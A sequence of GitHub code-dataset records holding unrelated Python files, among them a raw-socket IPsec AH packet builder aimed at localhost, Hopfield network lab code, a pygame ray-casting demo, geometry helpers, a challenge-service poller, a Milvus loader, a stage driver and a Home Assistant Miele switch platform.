17 = udp, 41 = ipv6, 50 = ipsec esp, 51 = ipsec ah\n\n        self.ip_chksm = 0 \n\n        self.ip_src = socket.inet_aton(self.src_address) \n        self.ip_dst = socket.inet_aton(self.dst_address) \n\n\n        self.new_ipv4_header = struct.pack('!BBHHHBBH4s4s', \n            self.ip_ver, self.ip_tos, self.ip_tolen, self.ip_id, self.ip_flg, self.ip_ttl, \\\n            self.ip_proto, self.ip_chksm, self.ip_src, self.ip_dst) \n\n        return self.new_ipv4_header\n\nclass the_ah_header:\n\n    def __init__(self):\n        self.new_ah_header = None\n        self.create_ah_header()\n\n    def create_ah_header(self):\n        self.ah_nxthdr = 4 #in tunnel mode | 4 = ipv4, 41 = ipv6\n        self.ah_plen = 4\n        self.ah_rserv = 0000\n        self.ah_spi = 0x00000000\n        self.ah_seqno = 1\n        self.au_icv = b'0'\n\n        self.new_ah_header = struct.pack('!bbhII12s', self.ah_nxthdr, self.ah_plen, self.ah_rserv, \\\n        \t\t\t\t\t\t\t\t\t\t\t\tself.ah_spi, self.ah_seqno, self.au_icv)\n        return self.new_ah_header\n\nclass the_icmp_header:\n    def __init__(self):\n        self.new_icmp_header = None\n\n    def create_icmp_header(self):\n        self.icm_type = 8\n        self.icm_code = 0\n        self.icm_chksm = 0xf7fd
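\n        # Note (sketch): 0xf7fd is precomputed for this exact echo request.\n        # A generic RFC 1071 ones'-complement checksum could be computed with\n        # a helper along these lines (inet_checksum is hypothetical, not\n        # defined in this script):\n        #   def inet_checksum(data):\n        #       if len(data) % 2:\n        #           data += b'\\x00'\n        #       total = sum(struct.unpack('!%dH' % (len(data) // 2), data))\n        #       total = (total & 0xffff) + (total >> 16)\n        #       total = (total & 0xffff) + (total >> 16)\n        #       return ~total & 0xffff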
\n        self.icm_id = 1\n        self.icm_seq = 1\n\n        self.new_icmp_header = struct.pack('!bbHHh',\n            self.icm_type, self.icm_code, self.icm_chksm, self.icm_id, self.icm_seq)\n\nconnection = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\nconnection.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nconnection.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n\nwhile True:\n\tget_oipv4_address = the_oipv4_header('100.100.100.101','100.100.100.100') \n\tget_oipv4_address.create_oipv4_packet() \n\tipv4_packet_01 = get_oipv4_address.new_ipv4_header\n\n\tget_ah_header = the_ah_header()\n\tah_header_01 = get_ah_header.new_ah_header\n\t'''print (len(ah_header_01))'''\n\n\tget_iipv4_address = the_iipv4_header('100.100.100.101','100.100.100.100') \n\tget_iipv4_address.create_iipv4_packet() \n\tipv4_packet_02 = get_iipv4_address.new_ipv4_header\n\n\tget_icmp_header = the_icmp_header()\n\tget_icmp_header.create_icmp_header()\n\ticmp_segment_01 = get_icmp_header.new_icmp_header\n\t#must change addresses to appropriate ip address\n\tconnection.sendto(ipv4_packet_01 + ah_header_01 + ipv4_packet_02 + icmp_segment_01 ,(('127.0.0.1',0)))\n\tprint('SENT')\n\ttime.sleep(1)","repo_name":"madawaladw/DW-Python3Scripts","sub_path":"Customized Packets/Packet-TypeAH.py","file_name":"Packet-TypeAH.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} {"seq_id":"6829504183","text":"# Import libraries\r\nimport numpy as np\r\nimport itertools\r\nimport load_data as ld\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\"\"\"\r\nThis lab is addressed to:\r\n- Explain the principles underlying the operation and functionality of\r\nautoassociative networks;\r\n- Train the Hopfield network;\r\n- Explain the attractor dynamics of Hopfield networks and the concept of energy\r\nfunction;\r\n- Demonstrate how autoassociative networks can do pattern completion and\r\nnoise reduction;\r\n- Investigate the question of storage capacity and explain features that help\r\nincrease it in associative memories.\r\n\"\"\"\r\n\r\ndef fit(training, method = 'self_connection'):\r\n    M = training.shape[1]\r\n    weights = np.zeros((M,M))\r\n    N = training.shape[0]\r\n    for i in range(M):\r\n        for j in range(M):\r\n            if method == 'self_connection':\r\n                weights[i, j] = 1/M * np.dot(training[:,i],training[:,j])\r\n            else:\r\n                if i == j:\r\n                    weights[i, j] = 0\r\n                else:\r\n                    weights[i, j] = 1/M * np.dot(training[:,i],training[:,j])\r\n\r\n    return weights\r\n\r\ndef sparse_fit(training,method='self_connection'):\r\n    M = training.shape[1]\r\n    weights = np.zeros((M, M))\r\n    N = training.shape[0]\r\n    rho = training.mean()\r\n    #print('rho',rho)\r\n    for i in range(M):\r\n        for j in range(M):\r\n            if method == 'self_connection':\r\n                weights[i, j] = np.dot(training[:, i]-rho, training[:, j]-rho)\r\n            else:\r\n                if i == j:\r\n                    weights[i, j] = 0\r\n                else:\r\n                    weights[i, j] = np.dot(training[:, i]-rho, training[:, j]-rho)\r\n    #print('weights', weights.mean())\r\n    #print('training size ', N)\r\n    #print('max weight ', np.max(weights))\r\n    return weights\r\n\r\ndef sparse_activation(x,bias,weight_row):\r\n    print(\"activation magnitude \",np.dot(weight_row,x))\r\n    return 0.5 + 0.5*sign(np.dot(weight_row,x)-bias)\r\n\r\n\r\ndef sparse_predict(weights,bias,test_original,max_iterations=100):\r\n    M = weights.shape[0]\r\n    previous_test = np.zeros((1, M))\r\n    counter = 0\r\n    np.random.seed(42)\r\n    test = test_original.copy()\r\n    while(counter<max_iterations):\r\n        # asynchronous update: refresh one randomly chosen unit per step\r\n        update_index = np.random.randint(M)\r\n        test[update_index] = sparse_activation(test, bias, weights[update_index])\r\n        counter += 1\r\n    return test\r\n\r\ndef sign(x):\r\n    if x>=0:\r\n        return 1\r\n    else:\r\n        return 
-1\r\n\r\n\r\ndef sign_vec(x):\r\n for i in range(x.shape[0]):\r\n if (x[i]>=0):\r\n x[i]=1\r\n else:\r\n x[i]=-1\r\n return x\r\n\r\ndef predict_little_model(weights,test_original,max_iterations=100):\r\n M = weights.shape[0]\r\n previous_test = np.zeros((1, M))\r\n counter = 0\r\n np.random.seed(42)\r\n test = test_original.copy()\r\n\r\n while (counter < max_iterations):\r\n previous_test = test.copy()\r\n # update_index = np.random.randint(M)\r\n # updated_bit = sign(np.dot(weights[update_index],test))\r\n test = sign_vec(np.dot(weights,previous_test))\r\n if (np.array_equal(previous_test, test)):\r\n break\r\n counter += 1\r\n # print(\"Total number of iterations \",counter)\r\n return test\r\n\r\n\r\ndef predict(weights,test_original,max_iterations=200,energy = False):\r\n M = weights.shape[0]\r\n previous_test = np.zeros((1,M))\r\n counter=0\r\n np.random.seed(42)\r\n test = test_original.copy()\r\n if (not energy):\r\n while(counter0):\r\n print(noise_magnitude)\r\n flipped_indeces = np.random.choice(M, noise_magnitude, replace=False)\r\n training_noise[flipped_indeces] = -training_noise[flipped_indeces]\r\n output = predict_little_model(weights,training_noise)\r\n accuracy[per,it,k,j] = compute_accuracy(train,output)\r\n print('accuracies ', accuracy[per,it,k])\r\n\r\n print(accuracy)\r\n\r\n accuracy_mean = accuracy.mean(axis=1)\r\n return accuracy_mean\r\n\r\ndef three_point_six(activity=10,bias_low=0,bias_high=6,bias_step=0.5):\r\n number_of_random_samples = 300\r\n training = np.zeros((number_of_random_samples, 100))\r\n\r\n\r\n\r\n skeleton = np.zeros(100)\r\n skeleton[:activity] = 1\r\n np.random.seed(42)\r\n if(activity==1):\r\n training = np.zeros((100, 100))\r\n number_of_random_samples=100\r\n for i in range(100):\r\n training[i][i]=1\r\n else:\r\n for i in range(training.shape[0]):\r\n training[i] = np.random.permutation(skeleton)\r\n print(\"Unique samples \", np.unique(training,axis=0).shape[0])\r\n print('training size', training.shape)\r\n bias_range = np.arange(bias_low, bias_high, bias_step)\r\n\r\n capacity_size = np.zeros(bias_range.shape[0])\r\n count=0\r\n for bias in bias_range:\r\n stable_patterns = np.zeros(number_of_random_samples)\r\n\r\n for i in range(number_of_random_samples-1):\r\n examined_training = training[:i + 1].copy()\r\n\r\n weights = sparse_fit(examined_training, method='self_connection')\r\n stable_points = 0\r\n for j in range(examined_training.shape[0]):\r\n output = sparse_predict(weights, bias, examined_training[j], max_iterations=100)\r\n # print('outputs ratio',output[output==1].shape[0]/output.shape[0])\r\n if (np.array_equal(examined_training[j], output)):\r\n stable_points += 1\r\n stable_patterns[i] = stable_points / examined_training.shape[0]\r\n if (stable_patterns[i]<1):\r\n break\r\n\r\n\r\n print(stable_patterns)\r\n capacity_size[count] = measure_capacity(stable_patterns)\r\n print('capacity size',capacity_size[count])\r\n '''\r\n plt.plot(np.arange(1, 301, 1), stable_patterns, label='Stable Points %')\r\n plt.vlines(13.8, 0, 1, linestyles='dashed', label='0.138*N')\r\n plt.legend()\r\n plt.title('Stable Pattern Percentage as a function of the training size')\r\n plt.xlabel('Number of Training Patterns')\r\n plt.ylabel('Stable Pattern Percentage')\r\n\r\n plt.show()\r\n '''\r\n count+=1\r\n plt.plot(bias_range, capacity_size, label = 'Capacity Size')\r\n position = bias_low + np.argmax(capacity_size)*bias_step\r\n plt.vlines(position,0,np.max(capacity_size),linestyles='dashed',label='At '+str(round(position,1)))\r\n 
plt.title(\"Capacity size as a function of the bias\")\r\n plt.xlabel(\"Bias\")\r\n plt.ylabel(\"Capacity Size\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef measure_capacity(stable_patterns):\r\n counter=0\r\n for num in stable_patterns:\r\n if (num==1):\r\n counter+=1\r\n else:\r\n break\r\n return counter","repo_name":"ddnimara/KTH_Projects","sub_path":"Artificial Neural Networks/DD2437_Artificial_Neural_Network_Lab_3/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":17392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"69812716526","text":"import pysidocast\nimport pygame\nfrom math import *\n\npygame.init()\n\nscene = pysidocast.Scene() # INIT THE SCENE\n\nPERF = 0.32 # Decrease this value to increase the performance (but decrease the quality)\ndim = (1280 * PERF, 720 * PERF)\n\nview_distance = 7\n\nmouse_sensitivity = 0.1\n\nscreen = pygame.display.set_mode(dim, pygame.SCALED) # | pygame.FULLSCREEN\n\nclock = pygame.time.Clock()\n\n# LOAD IMAGES\n\nimage = pygame.image.load(\".\\\\example\\\\bg.png\").convert_alpha() # WARNING: the \".convert_alpha()\" is mandatory\nred_blue_gradiant = pygame.image.load(\".\\\\example\\\\red_blue.png\").convert_alpha()\ntransparent = pygame.image.load(\".\\\\example\\\\transparent.png\").convert_alpha()\nuniform = pygame.image.load(\".\\\\example\\\\white.png\").convert_alpha()\n\n# If your wondering why the \".convert_alpha()\" is mandatory,\n# it's because in pygame, the pixel buffer will differ depending on the image format.\n# Using the \".convert_alpha()\" will convert the image to the same format as the screen.\n# In future versions, I will try to make the \".convert_alpha()\" optional.\n# But anyway, there is no reason for you to not use \".convert_alpha()\" in pygame, so don't worry about it.\n\n\n# LOAD STATIC SURFACES\n\nscene.add_wall(red_blue_gradiant,\n (1, 2, 2),\n (1, 0, 0))\n\nscene.add_wall(image,\n (1.5, 2, 0.5),\n (1.5, 0, 2.5))\n\nscene.add_wall(transparent,\n (-1, 2, 0),\n (-1, 0, 2))\n\nscene.add_quad(image,\n (-1 + 0.5, 2, 2),\n (0.75, 1.75, 2),\n (1, 0.5, 2),\n (-1, 0, 2))\n\nscene.add_surface(image,\n (-1, 0.0, 2),\n (1, 0.0, 2),\n (-1, 0.0, 0))\n\nscene.add_surface(image,\n (-2, 2, 1),\n (-2, 2, 0),\n (-3, 0, 1))\n\nspot = 0\nalpha = 0.0\nif __name__ == \"__main__\":\n y_angle = 90. # look toward the Z axis ( 0° = look toward the X axis; 90° = look toward the Z axis)\n x_angle = 0. # look toward the horizon ( 90° = look toward the sky; -90° = look toward the ground)\n x = 0.\n z = 1.\n y = 1.\n speed = 1. 
\n\n    # MAIN LOOP\n    while True:\n        # RESET THE SCREEN\n        screen.fill((0, 0, 0, 0))\n\n        # HANDLE THE TIME AND THE FPS\n        keys = pygame.key.get_pressed()\n        time_stamp = clock.tick(60) / 100\n        # fps = clock.get_fps()\n        # print(fps)\n\n        # HANDLE THE EVENTS\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                quit()\n\n        # HANDLE THE INPUTS\n\n        if pygame.key.get_focused():  # Place the mouse in the center of the screen when the window is active\n            pygame.mouse.set_visible(False)  # Hide the mouse\n            pygame.event.set_grab(True)  # Grab the mouse\n            rel = pygame.mouse.get_rel()  # Get the mouse movement since the last frame\n            if rel[0] or rel[1]:  # When the mouse moves, place it back in the center of the screen\n                pygame.mouse.set_pos(dim[0] // 2, dim[1] // 2)\n            x_angle -= rel[1] * mouse_sensitivity\n            y_angle -= rel[0] * mouse_sensitivity\n            x_angle = max(min(x_angle, 90), -90)  # Limit the angle to prevent the player from looking upside down\n        else:\n            # Give back the mouse control when the window is not active\n            pygame.mouse.set_visible(True)\n            pygame.event.set_grab(False)\n\n        # Move forward\n        if any((keys[pygame.K_z], keys[pygame.K_w], keys[pygame.K_UP])):\n            z += time_stamp * speed * sin(radians(y_angle))\n            x += time_stamp * speed * cos(radians(y_angle))\n        # Move backward\n        elif keys[pygame.K_s] or keys[pygame.K_DOWN]:\n            z -= time_stamp * speed * sin(radians(y_angle))\n            x -= time_stamp * speed * cos(radians(y_angle))\n        # Move left\n        if any((keys[pygame.K_q], keys[pygame.K_a], keys[pygame.K_LEFT])):\n            z += time_stamp * speed * sin(radians(y_angle + 90))\n            x += time_stamp * speed * cos(radians(y_angle + 90))\n        # Move right\n        elif keys[pygame.K_d] or keys[pygame.K_RIGHT]:\n            z -= time_stamp * speed * sin(radians(y_angle + 90))\n            x -= time_stamp * speed * cos(radians(y_angle + 90))\n\n        # Move up\n        if keys[pygame.K_SPACE]:\n            y += time_stamp * speed\n        # Move down\n        elif keys[pygame.K_LSHIFT]:\n            y -= time_stamp * speed\n\n        # ___________________RENDER THE SCENE\n\n        # PLACE THE LIGHTS INTO THE SCENE\n\n        scene.clear_lights()  # Clear the lights. You need to do this anytime a light moves or changes.
\n\n        # Add a directional light from the player position to where the player is looking\n        scene.add_light(\n            (x, y, z),  # position of the light\n            view_distance,  # strength of the light\n            0.5, 0.6, 0.7,  # color of the light\n            # direction of the light\n            direction=(x + cos(radians(y_angle)) * cos(radians(x_angle)) * view_distance * 1.8,\n                       y + sin(radians(x_angle)) * view_distance,\n                       z + sin(radians(y_angle)) * cos(radians(x_angle)) * view_distance * 1.8),\n        )\n\n        scene.add_light((0, 0, 0.5), 2, 0.3, 0.6, 0.2)  # add a green light at the origin\n\n        # add a directional light that moves around the scene\n        scene.add_light((cos(spot), 2, 1 + sin(spot)),\n                        3, 0.3, 0.3, 1.0,\n                        direction=(sin(spot), -3, cos(spot)))\n\n        spot += 0.07 * time_stamp  # move the light\n\n        # ADD THE DYNAMIC SURFACES INTO THE SCENE\n\n        alpha = (alpha + 0.01 * time_stamp) % 2.0  # Change the alpha value of the surface over time\n\n        # Add a surface that disappears and reappears using the alpha value\n        scene.add_wall(uniform,\n                       (-1, 2, 0),\n                       (1, 0, 0),\n                       alpha=abs(alpha - 1.0),  # alpha value goes from 0.0 ⏫ to 1.0 ⏬ to 0.0\n                       rm=True)\n\n        # RENDER THE SCENE\n\n        scene.render(screen,\n                     (x, y, z),\n                     x_angle, y_angle,\n                     fov=120,\n                     view_distance=view_distance,\n                     threads=-1)\n\n        pygame.display.update()\n","repo_name":"Yvant2000/PySiDoCast","sub_path":"example/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} {"seq_id":"23093287317","text":"#Double, triple, and square of a number\n\n#Input\n\nnum = int(input(\"Enter a number: \\n\"))\n\nresul1 = num * 2\nresul2 = num * 3\nresul3 = num ** 2\n\n#Output\n\nprint(\"Double: \",resul1,\"\\n\" \"Triple: \",resul2,\"\\n\" \"Square: \",resul3)\n","repo_name":"sabrinaaraujoo/Python","sub_path":"dobro-triplo.py","file_name":"dobro-triplo.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} {"seq_id":"28873231046","text":"import math\n\nclass Point:\n    def __init__(self, x = 0, y = 0):\n        self.x = x\n        self.y = y\n\n    def distance_to_line(self, line):\n        # standard point-to-line distance: |a*x + b*y + c| / sqrt(a^2 + b^2)\n        perpendicular = abs(line.a * self.x + line.b * self.y + line.c) / \\\n                        math.sqrt(line.a * line.a + line.b * line.b)\n        return perpendicular\n\nclass Line:\n    def __init__(self, p1, p2):\n        if p1.y == p2.y:\n            self.a = 0\n            self.b = 1\n            self.c = -p1.y\n        else:\n            self.a = 1\n            self.b = -self.a * (p2.x - p1.x) / (p2.y - p1.y)\n            self.c = -self.a * p1.x - self.b * p1.y\n\ndef squared_distance(p1, p2):\n    return (p1.x - p2.x) * (p1.x - p2.x) + (p1.y - p2.y) * (p1.y - p2.y)\n\ndef distance(p1, p2):\n    return math.sqrt(squared_distance(p1, p2))
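\n\n# Quick sanity checks for the helpers above and below (illustrative):\n#   distance(Point(0, 0), Point(3, 4))  # -> 5.0\n#   segments_intersect(Point(0, 0), Point(1, 1), Point(0, 1), Point(1, 0))\n#   # -> True: the unit square's diagonals cross at (0.5, 0.5)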
- p2.y) < 0\n else:\n in_first = (x - p1.x) * (x - p2.x) < 0\n\n if abs(l2.b) < 1e-5:\n # l2 is vertical\n in_second = (y - p3.y) * (y - p4.y) < 0\n else:\n in_second = (x - p3.x) * (x - p4.x) < 0\n\n return in_first and in_second\n","repo_name":"dantrag/pyspringsim","sub_path":"geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28175318530","text":"from dis import dis\nimport time\nimport poller_config\nimport poller_utility\n\ndef recvdata(conn, delay=2):\n if conn is None:\n return\n footerfound = False\n recvd = conn.recvuntil(poller_config.go_ahead, timeout=delay)\n if not recvd:\n return\n if recvd.find(poller_config.header) >= 0:\n recvd = recvd[recvd.find(poller_config.header) + 5:]\n if recvd.find(poller_config.footer) >= 0:\n footerfound = True\n recvd = recvd[:recvd.find(poller_config.footer)]\n if recvd.find(poller_config.go_ahead) >= 0 and not footerfound:\n recvd = recvd[:recvd.find(poller_config.go_ahead)]\n return recvd.decode('utf-8')\n\ndef senddata(conn, data, display=1):\n if data is not None:\n if display == 1:\n message='User('+data.replace('\\n', ' ').replace('\\r', '')+ ')'\n poller_utility.printMsg(message, poller_config.USER)\n conn.sendline(data.encode('utf-8'))\n\ndef sendSingleMessage(conn, message):\n time.sleep(1)\n response=recvdata(conn)\n if response is not None:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n senddata(conn, message)\n response=recvdata(conn)\n if response is not None:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n\ndef sendSingleMessageNoResp(conn, message):\n time.sleep(1)\n response=recvdata(conn)\n if response is not None:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n senddata(conn, message)\n\ndef getMessage(conn,clean=1):\n tries=10\n while tries > 0:\n time.sleep(1)\n response=recvdata(conn)\n if response is not None:\n tries = 10\n if clean == 1:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n return response\n tries-=1\n return -1","repo_name":"cromulencellc/chess-aces","sub_path":"phase_3/eval/kiaora/poller/poller_comms.py","file_name":"poller_comms.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"7885568508","text":"import pandas as pd\nfrom pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility\nfrom towhee import ops, pipe\n\nfrom constants import MILVUS_HOST, MILVUS_PORT, COLLECTION_NAME, TITLE_VECTOR_LENGTH, DATA_PATH\n\nconnections.connect(host=MILVUS_HOST, port=MILVUS_PORT)\n\n\ndef create_milvus_collection(collection_name, dim):\n if utility.has_collection(collection_name):\n utility.drop_collection(collection_name)\n\n fields = [\n FieldSchema(name=\"id\", dtype=DataType.INT64, is_primary=True, auto_id=False),\n FieldSchema(name=\"title\", dtype=DataType.VARCHAR, max_length=500),\n FieldSchema(name=\"title_vector\", dtype=DataType.FLOAT_VECTOR, dim=dim),\n FieldSchema(name=\"link\", dtype=DataType.VARCHAR, max_length=500),\n FieldSchema(name=\"reading_time\", dtype=DataType.INT64),\n FieldSchema(name=\"publication\", dtype=DataType.VARCHAR, 
max_length=500),\n FieldSchema(name=\"claps\", dtype=DataType.INT64),\n FieldSchema(name=\"responses\", dtype=DataType.INT64)\n ]\n schema = CollectionSchema(fields=fields, description='search text')\n collection = Collection(name=collection_name, schema=schema)\n\n index_params = {\n 'metric_type': \"L2\",\n 'index_type': \"IVF_FLAT\",\n 'params': {\"nlist\": 2048}\n }\n collection.create_index(field_name='title_vector', index_params=index_params)\n return collection\n\n\ncollection = create_milvus_collection(COLLECTION_NAME, TITLE_VECTOR_LENGTH)\n\ninsert_pipe = (pipe.input('df')\n .flat_map('df', 'data', lambda df: df.values.tolist())\n .map('data', 'res', ops.ann_insert.milvus_client(host=MILVUS_HOST,\n port=MILVUS_PORT,\n collection_name=COLLECTION_NAME))\n .output('res')\n )\n\ndf = pd.read_csv(DATA_PATH, converters={'title_vector': lambda x: eval(x)})\ninsert_pipe(df)\n\ncollection.load()\nprint(f\"Collection {COLLECTION_NAME} num_entities: {collection.num_entities}\")\n","repo_name":"petr7555/ai-text-demo","sub_path":"ai_text_demo/milvus_search_titles/01_insert_data.py","file_name":"01_insert_data.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19156386063","text":"from instrument import Instrument\nfrom time import sleep\n\nclass Stage(Instrument):\n def __init__(self, address=None, axis=1):\n self.identificator = 'stage'\n super().__init__(address, self.identificator)\n self.axis = axis\n self.last_position = None\n\n def initialise(self):\n self.write(\"MO\")\n\n def write(self, cmd):\n newcmd = str(self.axis) + cmd\n self.instr.write(newcmd)\n\n def ask(self, cmd):\n newcmd = str(self.axis) + cmd\n result = self.instr.ask(newcmd)\n return result\n\n def stop(self):\n self.write('ST')\n\n def check_motor_status(self):\n try: status = int(self.ask('MD?'))\n except:\n return 1\n if status == 0:\n return 1\n else:\n return 0\n\n def move_to(self, new_pos, wait=True):\n if self.check_motor_status() == 1:\n self.stop()\n\n self.write(\"PA {0}\".format(new_pos))\n if wait == True:\n while (self.check_motor_status() == 1):\n sleep(0.05)\n\n def read_pos(self):\n try:\n pos = float(self.ask('TP'))\n self.last_position = pos\n return pos\n except:\n print(\"Can't read the stage position!\")\n return None\n\n def set_speed(self, speed='max'):\n max_speed = float(self.ask('VU?'))\n\n if speed == 'max':\n self.write('VA {0}'.format(max_speed))\n else:\n try: speed_float = float(speed)\n except ValueError:\n print(\"The speed value must be a number!\")\n return None\n else:\n if speed_float > max_speed:\n print(\"The maximum speed value is {0}\".format(max_speed))\n return None\n else:\n self.write('VA {0}'.format(speed_float))\n","repo_name":"alkamid/lab-suite","sub_path":"stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30523562096","text":"\"\"\"Platform for Miele switch integration.\"\"\"\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\nimport logging\nfrom typing import Any, Final\n\nimport aiohttp\n\nfrom homeassistant.components.switch import SwitchEntity, SwitchEntityDescription\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType\nfrom 
homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom . import get_coordinator\nfrom .const import (\n ACT_START_SUPERCOOL,\n ACT_START_SUPERFREEZE,\n ACT_STOP_SUPERCOOL,\n ACT_STOP_SUPERFREEZE,\n ACTIONS,\n API,\n COFFEE_SYSTEM,\n DIALOG_OVEN,\n DISHWASHER,\n DOMAIN,\n FREEZER,\n FRIDGE,\n FRIDGE_FREEZER,\n HOOD,\n MANUFACTURER,\n MICROWAVE,\n OVEN,\n OVEN_MICROWAVE,\n POWER_OFF,\n POWER_ON,\n PROCESS_ACTION,\n STEAM_OVEN,\n STEAM_OVEN_COMBI,\n STEAM_OVEN_MICRO,\n STEAM_OVEN_MK2,\n TUMBLE_DRYER,\n TUMBLE_DRYER_SEMI_PROFESSIONAL,\n WASHER_DRYER,\n WASHING_MACHINE,\n WINE_CABINET_FREEZER,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\n@dataclass\nclass MieleSwitchDescription(SwitchEntityDescription):\n \"\"\"Class describing Miele switch entities.\"\"\"\n\n data_tag: str | None = None\n type_key: str = \"ident|type|value_localized\"\n on_value: int = 0\n off_value: int = 0\n on_data: dict[str, Any] | None = None\n off_data: dict[str, Any] | None = None\n\n\n@dataclass\nclass MieleSwitchDefinition:\n \"\"\"Class for defining switch entities.\"\"\"\n\n types: tuple[int, ...]\n description: MieleSwitchDescription = None\n\n\nSWITCH_TYPES: Final[tuple[MieleSwitchDefinition, ...]] = (\n MieleSwitchDefinition(\n types=[FRIDGE, FRIDGE_FREEZER],\n description=MieleSwitchDescription(\n key=\"supercooling\",\n data_tag=\"state|status|value_raw\",\n on_value=14,\n icon=\"mdi:snowflake\",\n translation_key=\"supercooling\",\n on_data={PROCESS_ACTION: ACT_START_SUPERCOOL},\n off_data={PROCESS_ACTION: ACT_STOP_SUPERCOOL},\n ),\n ),\n MieleSwitchDefinition(\n types=[FREEZER, FRIDGE_FREEZER, WINE_CABINET_FREEZER],\n description=MieleSwitchDescription(\n key=\"superfreezing\",\n data_tag=\"state|status|value_raw\",\n on_value=13,\n icon=\"mdi:snowflake\",\n translation_key=\"superfreezing\",\n on_data={PROCESS_ACTION: ACT_START_SUPERFREEZE},\n off_data={PROCESS_ACTION: ACT_STOP_SUPERFREEZE},\n ),\n ),\n MieleSwitchDefinition(\n types=[\n WASHING_MACHINE,\n TUMBLE_DRYER,\n TUMBLE_DRYER_SEMI_PROFESSIONAL,\n DISHWASHER,\n OVEN,\n OVEN_MICROWAVE,\n STEAM_OVEN,\n MICROWAVE,\n COFFEE_SYSTEM,\n HOOD,\n WASHER_DRYER,\n STEAM_OVEN_COMBI,\n STEAM_OVEN_MICRO,\n DIALOG_OVEN,\n STEAM_OVEN_MK2,\n ],\n description=MieleSwitchDescription(\n key=\"poweronoff\",\n data_tag=\"state|status|value_raw\",\n off_value=1,\n icon=\"mdi:power\",\n translation_key=\"power_on\",\n on_data={POWER_ON: True},\n off_data={POWER_OFF: True},\n ),\n ),\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigType,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the switch platform.\"\"\"\n coordinator = await get_coordinator(hass, config_entry)\n\n entities = []\n for idx, ent in enumerate(coordinator.data):\n for definition in SWITCH_TYPES:\n if coordinator.data[ent][\"ident|type|value_raw\"] in definition.types:\n entities.append(\n MieleSwitch(\n coordinator,\n idx,\n ent,\n definition.description,\n hass,\n config_entry,\n )\n )\n\n async_add_entities(entities)\n\n\nclass MieleSwitch(CoordinatorEntity, SwitchEntity):\n \"\"\"Representation of a Switch.\"\"\"\n\n entity_description: MieleSwitchDescription\n\n def __init__(\n self,\n coordinator: DataUpdateCoordinator,\n idx,\n ent,\n description: MieleSwitchDescription,\n hass: HomeAssistant,\n entry: ConfigType,\n ):\n \"\"\"Initialize the switch.\"\"\"\n super().__init__(coordinator)\n self._api = hass.data[DOMAIN][entry.entry_id][API]\n self._api_data = 
hass.data[DOMAIN][entry.entry_id]\n\n self._idx = idx\n self._ent = ent\n self.entity_description = description\n _LOGGER.debug(\"init switch %s\", ent)\n appl_type = self.coordinator.data[self._ent][self.entity_description.type_key]\n if appl_type == \"\":\n appl_type = self.coordinator.data[self._ent][\n \"ident|deviceIdentLabel|techType\"\n ]\n self._attr_has_entity_name = True\n self._attr_unique_id = f\"{self.entity_description.key}-{self._ent}\"\n self._attr_device_info = DeviceInfo(\n identifiers={(DOMAIN, self._ent)},\n serial_number=self._ent,\n name=appl_type,\n manufacturer=MANUFACTURER,\n model=self.coordinator.data[self._ent][\"ident|deviceIdentLabel|techType\"],\n )\n\n @property\n def is_on(self):\n \"\"\"Return the state of the switch.\"\"\"\n if self.entity_description.key in {\"supercooling\", \"superfreezing\"}:\n return (\n self.coordinator.data[self._ent][self.entity_description.data_tag]\n == self.entity_description.on_value\n )\n\n elif self.entity_description.key in {\"poweronoff\"}:\n power_data = (\n self._api_data.get(ACTIONS, {}).get(self._ent, {}).get(POWER_OFF, True)\n )\n return power_data\n\n return False\n\n @property\n def available(self):\n \"\"\"Return the availability of the entity.\"\"\"\n\n if not self.coordinator.last_update_success:\n return False\n\n if self.entity_description.key in {\"poweronoff\"}:\n power_data = (\n self._api_data.get(ACTIONS, {}).get(self._ent, {}).get(POWER_OFF, False)\n ) or (\n self._api_data.get(ACTIONS, {}).get(self._ent, {}).get(POWER_ON, False)\n )\n return power_data\n\n return self.coordinator.data[self._ent][\"state|status|value_raw\"] != 255\n\n async def async_turn_on(self, **kwargs):\n \"\"\"Turn on the device.\"\"\"\n _LOGGER.debug(\"turn_on -> kwargs: %s\", 